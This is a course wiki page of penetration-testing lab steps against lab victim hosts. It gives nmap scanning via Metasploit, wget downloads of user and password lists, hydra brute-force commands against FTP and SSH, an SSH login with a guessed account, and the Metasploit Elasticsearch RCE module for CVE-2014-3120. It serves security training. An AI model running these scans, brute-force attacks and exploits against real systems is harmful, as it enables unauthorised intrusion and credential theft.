Skip to content

z‐ old Labs

Dean Bushmiller edited this page Jun 20, 2024 · 1 revision

Part 1

  • You may do unsupported local lab
  • You should do AWS remote lab

Reconnaissance

Recon of website expsec.us

  • Collect social media or public data
  • think of all the ways admins build user logins - populate user list on sheet
  • think of all ways to make a bad password, or login use to populate password list

Part 2

  • You are doing what a tester does.
  • You are need to put in 1000 hours of deliberate practice to be a pen tester
  • This is a walk in the park, not building a park

Load Kali

Load password list into Kali

Homework: test lab setup & shutdown machine after testing

Since this is a one day class- you can do labs after & email for help

Scan, Collect & Document what services are we running on victims?

  • Victim IP addresses: 10.0.0.10 & 10.0.0.21 (2)

  • Using Metasploit and Nmap together as a scanner

  • IN KALI

  • @ $

  •   bash
    
  • this is an insecure shortcut for production systems

  •   sudo -i
    
  • @ root

  •   msfconsole
    
  • @ msf6>

  •   color true
    
  •   db_nmap -sS -A 10.0.0.10-21
    
  •   services
    
  • Document

  • IN Artifact repository Manually (google sheet/ YOUR copy and paste)

  • Copy output to Vulnerabilities 1 tab (still unconfirmed)

  • https://docs.google.com/spreadsheets/d/1PMK589QX5tC9KAMsuoTnR2uVhEVh8830xJNC0N0zdyM/edit?usp=sharing

  • Reformat

  • IN KALI

  • @ msf6>

  •   exit
    
  • !!!done!!!

Upload large password lists & expsec possible user list

  • IN KALI
  • @ root
  •   apt -y install seclists
    
  •   seclists -h
    
  • Upload expsec possible user list & custom password list
  • Shortcut: I put cleaned expsec (this takes planning & process)
  • User list on AWS S3
  • ` Using wget & moving into correct directory
  • IN KALI
  • @ root
  •   wget https://ceh-v11-20220609.s3.amazonaws.com/expsecusers.txt
    
  •   mv expsecusers.txt /usr/share/seclists/Usernames/
    
  •   wget https://ceh-v11-20220609.s3.amazonaws.com/expsec-passwords.txt
    
  •   mv expsec-passwords.txt /usr/share/seclists/Passwords/
    
  • !!!done!!!

Password Guessing against 2 targets running FTP & SSH

  • Using hydra
  • From Scan: Port 21 & 22 are open on .10 & .21
  • From seclist we have multiple list (one real short, one fake because the lab can't take 122 hrs)
  • make 2 target lists by echoing data into a file
  • IN KALI
  • @ root
  •   echo '10.0.0.10:21' >> targetsFTP.txt
    
  •   echo '10.0.0.21:21' >> targetsFTP.txt
    
  •   echo '10.0.0.10:22' >> targetsSSH.txt && echo '10.0.0.21:22' >> targetsSSH.txt	
    
  • verify your file contents
  •   cat targetsFTP.txt
    
  •   cat targetsSSH.txt
    
  • verify if you are in /usr/share/seclist (see 2 target files above)
  •   ls
    
  • Use 1 famous list of passwords & a custom list
  • How long does first take?
  •   hydra -L ./Usernames/expsecusers.txt  -P ./Passwords/xato-net-10-million-passwords-100.txt -M targetsFTP.txt ftp
    
  •   hydra -L ./Usernames/expsecusers.txt  -P ./Passwords/expsec-passwords.txt -M targetsFTP.txt ftp	
    
  •   hydra -L ./Usernames/expsecusers.txt  -P ./Passwords/expsec-passwords.txt -M targetsSSH.txt ssh		
    
  • Who do we get?
  • Document
  • IN Artifact repository Manually (google sheet/ your copy and paste)
  • Copy output to Vulnerabilities 1 tab (still unconfirmed)
  • Reformat
  • !!!done!!!

Vulnerability search: for three found

Exploit

  • We have SSH so we can do anything. But we are not.
  • Start a SSH instance and escalate priv.
  • IN KALI
  • @ root
  •   ssh 10.0.0.21 -l boba_fett
    
  • Supply password from your Artifact's sheet
  •   CTRL Z
    
  • You now have a remote shell on the windows victim ( it will NOT act like your Kali terminal)
  • What you can do depends on microsoft administrator skills.
  • Exploit port 9200
  • IN KALI
  • @ msf6>
  • ? what services have we captured
  •   services
    
  • ? use exploit (CVE-2014-3120)
  • I am not giving you the settings for set ( you must think and apply what you have learned)
  •   use exploit/multi/elasticsearch/script_mvel_rce
    
  •   set RHOST
    
  •   set LHOST
    
  •   set RPORT
    
  •   set LPORT 4444
    
  • normally we set PAYLOAD but we are trying to verify exploit only
  •   run
    
  • returned message: Exploit completed, but no session was created.
  • !!!done!!!

Repeat this 300 times and you have a full penetration test.

SHUT DOWN ALL MACHINES IF YOU WANT TO KEEP PAYING AND RESTART LAB

DELETE CLOUD FORMATION & DETELE AMI'S TO STOP PAYING